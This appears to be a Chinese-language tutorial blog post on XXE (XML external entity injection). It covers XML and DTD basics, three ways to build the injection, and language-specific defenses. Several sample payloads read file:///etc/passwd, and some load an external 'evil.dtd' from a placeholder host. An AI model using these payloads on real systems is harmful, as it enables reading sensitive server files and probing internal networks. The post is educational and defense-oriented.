DAY34:XXE 漏洞基础

已于 2022-09-22 16:58:16 修改
阅读量377 收藏
点赞数 1
文章标签: 前端 安全
于 2022-08-18 16:47:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49433473/article/details/126409211
版权

DAY34:XXE 漏洞

1、XML 外部实体注入( Extensible markup language )

2、XML 基本格式

​ XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素

2.1、构建模块

  • 元素
元素是 XML 以及 HTML 文档的主要构建模块,元素可包含文本、其他元素或者是空的
  • 属性
属性可提供有关元素的额外信息
  • 实体
实体是用来定义普通文本的变量。实体引用是对实体的引用
  • PCDATA
PCDATA 的意思是被解析的字符数据(parsed character data)。
PCDATA 是会被解析器解析的文本。这些文本将被解析器检查实体以及标记
  • CDATA
CDATA 的意思是字符数据(character data)。
CDATA 是不会被解析器解析的文本

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>	#XML文件声明 DTD为XML文档定义语义约束
<bookstore>
	<book category="test">   #属性
		<title>XML Study</title>
		<day>2022-08-18</day>
	</book>
</bookstore>	

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE foo [
<!ENTITY file SYSTEM "file:///etc/passwd">]>    //内部实体为 file
<user>
<username>&file;</username>					  //此处应为 &file;
<password>111</password>
</user>

请添加图片描述

外部声明(引用外部DTD):

<!DOCTYPE 根元素 SYSTEM "文件名"> 
</!doctype>

<!DOCTYPE test SYSTEM 'http://www.test.com/evil.dtd'>

3、基本语法

(1)所有的 XML 元素都必须有关闭标签

(2)XML 标签对大小写敏感

(3)XML 属性值必须加引号

(4)XML 必须正确嵌套

(5)XML 标签自定义

4、DTD

DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。

DTD 可以在 XML 文档内声明,也可以外部引用

内部声明:

<!DOCTYPE 根元素 [元素声明]>

外部声明:

<!DOCTYPE 根元素 SYSTEM "文件名">

4.1、DTD 实体

(1)一般实体

(2)参数实体

4.3、一般实体

声明语法:

<!ENTITY 实体名 "实体内容">

引用实体的方式:

&实体名;

4.4、参数实体:

只能在DTD中使用,参数实体的声明格式:

 <!ENTITY % 实体名 "实体内容">

引用实体的方式:

%实体名

内部实体声明:

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">
]>

5、构建外部实体注入方式

5.1、直接通过DTD外部实体声明

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe [
	<!ENTITY file SYSTEM "file:///etc/passwd">]>
<c>&file;</c>

5.2、通过DTD文档引入外部DTD文档,再引入外部实体声明

XML:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe SYSTEM "url/evil.dtd">
<c>&file;</c>

DTD:

<!ENTITY file SYSTEM "file:///etc/passwd">

5.3、通过DTD外部实体声明引入外部实体声明

XML:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
	<!ENTITY % a SYSTEM "url/evil.dtd">
	%a;
]>
<c>&file;</c>

DTD:

<!ENTITY file SYSTEM "file:///etc/passwd">

6、XXE 的危害

(1)读取任意文件

(2)执行系统命令

(3)探测内网端口

(4)攻击内网网站

7、XXE 的防御

(1)使用开发语言提供的禁用外部实体的方法

PHP:
libxml_disable_entity_loader(true);
 
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
 
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

(2)过滤用户提交的 XML 数据

<!DOCTYPE和<!ENTITY
SYSTEM
PUBLIC
EdmunDJK
关注
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
SCAN_XXE:利用XML XXE漏洞
05-07
XML External Entity(XXE,XML外部实体)漏洞是一种常见的安全问题,主要出现在处理XML输入的Web应用程序中。这种漏洞允许攻击者通过恶意构造的XML文档,来读取服务器的内部文件、执行系统命令或者进行DoS(拒绝...
xxexploiter:帮助利用XXE漏洞的工具
02-06
XX资源管理器 它生成XML有效负载,并自动启动服务器以服务所需的DTD或进行数据渗透。 安装 #install node and npm if you don't have it yet npm install -g xxexploiter 从源代码构建和运行 ...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
一些常用的react hooks以及各自的作用
weixin_48602044的博客
11-01 230
关于react hooks的一些知识与应用
做一个能适配「手机」的网站需要注意什么
illidri的博客
11-01 253
像现在主流会采用 H5 响应式布局,仅涉及前端的开发工作,代码量少,效果佳,是一种性价比比较高的选择,如果题主有意要进行网站建站,特别是想要手机浏览也有一定效果,可以选择这种~当然还有一种类似的方式叫自适应布局,俗称 AWD(AdaptiveWebDesign),同样是检测视口分辨率,判断不同尺寸和分辨率是什么设备,从而返回不同布局页面。最根本的区别在于,响应式页面的代码量少,但质量要求高,根据不同分辨率自动调整排版,而自适应页面需要根据不同设备准备不同的页面,这样前期的开发工作就大了很多。
前端 常见开发工具使用
weixin_45534301的博客
10-31 462
【代码】前端 常见开发工具使用。
Google Recaptcha V2 简单使用
吴家健ken的博客
10-30 292
Google Recaptcha V2 简单使用
Maven+Jsp+Vue的文视界创作平台
最新发布
战族狼魂的博客
11-03 66
主要擅长SpringBoot、Vue、SSM、HLMT、Jsp、Nodejs、Python、爬虫、数据可视化、小程序、物联网、前端、数据库等设计与开发;功能设计、功能实现、代码编写、代码调试运行、协助代码逻辑理解、调试过程中问题解决;
Web Broker(Web服务应用程序)入门教程(2)
caridle的专栏
11-03 489
接下来,调度器遍历其动作项列表,寻找与请求消息的目标 URL 的 PathInfo 部分匹配,并且提供请求消息方法所指定的服务的条目。只能有一个动作项是默认动作项。如果已经触发的动作项的 Default 属性被设置为 True,则该动作项不会被重新评估,当调度器到达动作列表末尾时,也不会触发该动作项。在将工作分配给多个动作项时,要么默认动作项的 OnAction 事件处理程序,要么调度器的 AfterDispatch 事件处理程序应该检查所有工作是否完成,如果没有完成,则设置适当的错误代码。
前端JS去重的多种方法
Front end development engineer
10-30 346
前端开发中,去重操作是非常常见的。无论是处理用户输入、数据请求还是渲染页面,都可能需要对数组或对象进行去重。下面将详细介绍几种常见的前端JS去重方法,并分析它们的优缺点。以上就是前端JS去重的几种常见方法。每种方法都有其优缺点,选择哪种方法取决于具体的需求和场景。如果需要兼容性好且可以保留顺序,可以使用filter()、reduce()或for循环;如果追求性能和简洁性,可以使用Set或Map。对于对象去重,Map是最好的选择。
【TabBar嵌套Navigation案例-常见问题按钮-WebView-加载网页 Objective-C语言】
madoca的博客
11-03 669
【TabBar嵌套Navigation案例-常见问题按钮-WebView-加载网页 Objective-C语言】
Vue中监听属性watch的求值,以及与computed的适用场景
friend_ship的博客
11-01 360
监听属性的特点:惰性。当值第一次绑定时,不会执行监听函数,只有当值发生改变才会执行。 监听属性watch与计算属性computed的适合场景
element-plus校验单个form对象合法性
xiaohuli_hyr的博客
11-01 469
请注意,这个示例假设使用的是 Element Plus 作为 UI 库。如果使用的是其他 UI 库,可能需要调整代码以适应该库的 API。此外,这个示例验证了列表中第一个对象,如果你需要验证其他对象,你可以修改 validateSingleItem 方法调用时传递的索引。在 Vue 中,循环生成的表单列表,并且每个表单中包含多个对象,使用 v-for 来创建这些表单,并且使用动态 prop 路径来验证单个对象是否满足必填校验。/* 样式根据需要添加 */// 验证指定索引的对象。// ...更多对象。
音乐网站新篇章:SpringBoot Web实现
2401_85763639的博客
10-31 729
在概念模式的设计中,E-R模型法是最常见的设计方法。B/S架构的运行方式是在远程的服务器上把开发的软件系统部署在远程的服务器上,在部署好软件系统之后就可以实现在任何接入互联网的电脑上访问部署好的软件系统。6、网络上的客户端和服务器可以用来编程任何独立的编程环境,也有中国,GB2312,BIG5,日文写作,一般基金,用于支持多国语言,并且可以嵌入在数据表和其他软件shift_jis访问柱可以用作的名称。编程语言,如C, C ++,Python和Java的,的Perl,PHP,埃菲尔铁塔,Ruby和Tcl的。
楼梯区域分割系统:Web效果惊艳
qmsb99的博客
11-02 740
数据集信息展示在本研究中,我们使用了名为“Stairs”的数据集,以改进YOLOv8-seg模型在楼梯区域分割任务中的表现。该数据集专门设计用于训练和评估模型在复杂环境中对楼梯及其周边区域的识别能力。数据集包含五个类别,分别为“Grass”(草地)、“Ground”(地面)、“Ramp”(坡道)、“Road”(道路)和“Stairs”(楼梯),这些类别的选择旨在覆盖楼梯周围常见的环境特征,从而为模型提供丰富的上下文信息。数据集的构建经过精心设计,确保每个类别的样本数量和多样性,以增强模型的泛化能力。
浅谈JS的DOM对象
Front end development engineer
10-30 298
前端开发中,我们经常需要在服务器端或测试环境中模拟浏览器的DOM(文档对象模型)。这就是JSdom对象的用武之地。JSdom是一个JavaScript库,允许你在没有浏览器的情况下使用DOM API。它可以解析HTML和XML文档,生成相应的DOM树,并提供了与浏览器中相同的接口来操作和查询这些元素。本文将详细介绍JSdom对象的工作原理、用法和应用场景,帮助你更好地理解和使用这个强大的工具。
【含开题报告+文档+源码】基于Web的房地产销售网站的设计与实现
码蜂窝编程-全网唯一毕设在线答疑,项目包运行成功,全套教学视频一站式辅导机构。
11-03 343
本课程演示的是一款 基于Web的房地产销售网站的设计与实现,主要针对计算机相关专业的正在做毕设的学生与需要项目实战练习的 Java 学习者。1.包含:项目源码、项目文档、数据库脚本、软件工具等所有资料2.带你从零开始部署运行本套系统3.该项目附带的源码资料可作为毕设使用该SpringBoot+Vue的房地产销售系统,后端采用SpringBoot架构,前端采用Vue+ElementUI实现页面的快速开发,并使用关系型数据库MySQL存储系统运行数据。本系统角色分别是:系统管理员,顾客。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值